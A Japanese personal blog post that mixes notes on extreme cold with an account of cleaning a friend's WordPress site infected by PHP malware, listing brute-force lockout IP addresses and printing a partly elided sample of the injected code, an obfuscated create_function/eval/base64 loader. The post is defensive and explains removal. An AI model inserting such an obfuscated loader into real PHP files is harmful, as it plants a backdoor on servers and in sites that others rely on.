ウイルス感染

いつまで続くこの寒さ！

寒い！
午前７時１０分：気温－１９.３℃、玄関前の雪温：－１３℃
もう二週間以上真冬日が続いている。

雪温：－１３℃ 下層部はしまり雪でガチガチ

庭先のニシキギ

庭の中央部に足跡！ 獣？

この足跡は！

知人のノートPC内のWordPressの挙動がおかしいと言うので（昨年からそのままにしていたらしい）昨日預かってきた。
なかを見てみると、昨年から世界中で蔓延したWordPressをターゲットにしたウイルスに感染している。

ウイルス感染

WPの挙動がおかしくなり、大量のスパムメールが入るようになったと言っている。

不正アタックによるログインエラー履歴

ログインエラー履歴を見ると膨大な数の履歴が残されている。
PCは恐ろしい頻度で不正アタックを試みられていて、ブロックしているとはいえ危険度大！！

ウイルスツールが、パスワードを１つ１つ手当たり次第に入力して不正アクセスを試みている！簡単なパスワードやIDなら数分もかからず解読されてしまだろう。
まさにいたちごっこで、セキュリティ問題ほど難しいものはない。

この間にも、

　
　　IP Tried to log in as
　　61.114.178.244 (1 lockout)
　　27.94.27.180 (1 lockout)
　　123.50.10.79 (1 lockout)
　　122.1.33.70 (1 lockout)
　　117.103.185.20 (1 lockout)
　　133.204.222.44 (1 lockout)
　　106.188.188.122 (1 lockout)
　　49.97.93.223 (1 lockout)
　　202.232.168.89 (1 lockout)
　　114.179.127.141 (1 lockout)
　　118.15.174.217 (1 lockout)
　　114.159.218.74 (1 lockout)
　　118.155.203.6 (1 lockout)
　　221.254.55.14 (1 lockout)
　　210.175.152.83 (1 lockout)
　　210.191.215.5 (1 lockout)
　　　　　　　　・
　　　　　　　　・
　　　　　　　　・

アタックが続いている！
アタックしてきたIPアドレスで「国籍」、「プロバイダ」は分かるものの、相手を特定することはできない。
※ 各プロバイダも「個人情報保護法」その他で個人情報開示はしません（出来ません）。

そして「一切責任は持てないから！」と断りを入れてから、一先ずこのマルウエアの該当コード削除を始めたが！厄介なのは、このウイルスはPHPまるごと感染すること！

このウイルスは、WordPressに限らず、サーバー上全てのPHPファイルに、次のようなコードが埋め込まれる。

　
＜?php $zend_framework=”\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e”; @error_reporting(0); $zend_framework(“”, “\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x6　・・・　（省略）　・・・
　
DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3N
FwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNj
FceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiI
pOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f”); ?＞

処置方法は、感染したPHPファイルの上記該当コードを削除するだけなのですが、サーバー上ほぼ全てのPHPファイルが感染しているので、削除作業は大変！

WordPressはPHPで書かれているので内部にある大量のPHPファイル（/wp-content/フォルダなど、フォルダもすべてチェック）を個別に確認する必要がある。
すべてチェックするのは大変な作業となるので、削除可能なものは、削除 → 再インストールで対処。
その他は、FTPソフトで焦らず１つずつ該当するコードを削除して行く。
※ 特にFreeのThemeはほぼ100％感染していた。
使用していないテーマをいくつもインストールしておかないで、削除した方が良い。

何時間かかったのか　・・・　？
挙動は修正されたようだが、まだ見落としがないとも言えない。

ログイン及びFTPパスも変更し、とりあえず終わった旨を電話するとすぐにノートPCを取りに来た。彼はパソコンがないと日々身動きが取れなようだ。

彼のみならず、今や各家庭でも無くてはならないモノになりつつあるようだが、無くても生きて行ける。無くなったところで、しばらくの間は多少の不便を感じることがあっても直ぐに慣れるのが人間。
スマホや携帯電話すら持っていない人も周りにはまだまだ大勢いる。
誰もがパソコン・スマホ等保有が当たり前を前提とした社会のシステム造りが加速し、持たない人たちに対する気配り・優しさが消えつつある社会には寒気がする。

今やTVのみならず、あらゆる家電製品がネットで繋がれており、個人情報などは丸見えで常に覗かれている。便利なモノほど大きなリスクはつきもの！

　
「インターネットは人間が作ったが、人間には理解できない無秩序状態の最も壮大な実験だ。」
“The Internet is the first thing that humanity has built that humanity doesn’t understand, the largest experiment in anarchy that we have ever had.”
　- Eric Schmidt （エリック・シュミット / Google 社の元CEO） –

WordPressを使用されている方は、今一度ソース内のPHPファイルを再確認されては！
私もSNSなど、0と1の世界に振り回されないように最小限での活用を心がけている。

あ ～　 肩がこった！

07：15　気温/-19℃　（.all images:biei.info）